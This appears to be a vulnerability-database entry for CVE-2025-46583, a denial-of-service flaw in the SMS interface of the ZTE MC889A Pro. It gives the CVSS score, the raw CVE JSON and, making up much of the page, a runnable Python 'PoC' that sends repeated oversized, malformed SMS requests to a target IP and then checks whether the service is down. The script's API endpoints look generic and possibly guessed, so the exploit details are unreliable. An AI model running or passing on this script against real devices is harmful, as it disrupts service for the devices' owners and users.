Security Vulnerability Report
CVE-2025-46583 CVSS 5.3 MEDIUM

CVE-2025-46583

Published: 2025-10-27 10:15:39
Last Modified: 2026-04-15 00:35:42

Description

There is a Denial of Service (DoS) vulnerability in the ZTE MC889A Pro product. Insufficient validation of the input parameters of the Short Message Service interface allows an attacker to carry out a DoS attack.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

ZTE MC889A Pro (firmware version not specified)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-46583 PoC - ZTE MC889A Pro SMS DoS
# Description: Denial of Service via SMS service interface due to insufficient input validation
import requests
import sys
import time


def send_malicious_sms(target_ip, payload_size=10000):
    """
    Send malformed SMS request to trigger DoS condition
    """
    # Construct malicious SMS request with oversized/malformed payload
    sms_endpoint = f"http://{target_ip}/api/sms/send"

    # Malformed payload that triggers DoS
    malicious_payload = {
        "phone_number": "1234567890",
        "message": "A" * payload_size,  # Oversized message
        "encoding": "invalid_encoding",  # Invalid encoding parameter
        "timestamp": None  # Null timestamp
    }

    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0"
    }

    try:
        response = requests.post(sms_endpoint, json=malicious_payload, headers=headers, timeout=10)
        print(f"[*] Request sent to {sms_endpoint}")
        print(f"[*] Response status: {response.status_code}")
        return response.status_code == 200 or response.status_code == 500
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return False


def verify_dos(target_ip):
    """
    Verify if SMS service is unavailable after attack
    """
    sms_endpoint = f"http://{target_ip}/api/sms/status"
    try:
        response = requests.get(sms_endpoint, timeout=10)
        if response.status_code != 200:
            print("[+] DoS condition confirmed - SMS service unavailable")
            return True
    except:
        print("[+] DoS condition confirmed - SMS service unavailable")
        return True
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-46583_poc.py <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    print(f"[*] Starting DoS attack on {target}")
    print(f"[*] Target: ZTE MC889A Pro SMS Service")

    # Send multiple malformed requests
    for i in range(10):
        print(f"[*] Sending request {i+1}/10")
        send_malicious_sms(target)
        time.sleep(0.5)

    # Verify DoS condition
    time.sleep(2)
    if verify_dos(target):
        print("[+] Attack successful - SMS service DoS achieved")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46583", "sourceIdentifier": "[email protected]", "published": "2025-10-27T10:15:39.210", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a Denial of Service(DoS)vulnerability in the ZTE MC889A Pro product. Due to insufficient validation of the input parameters of the Short Message Service interface, allowing an attacker to exploit it to carry out a DoS attack."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "references": [{"url": "https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/2594779029512220894", "source": "[email protected]"}]}}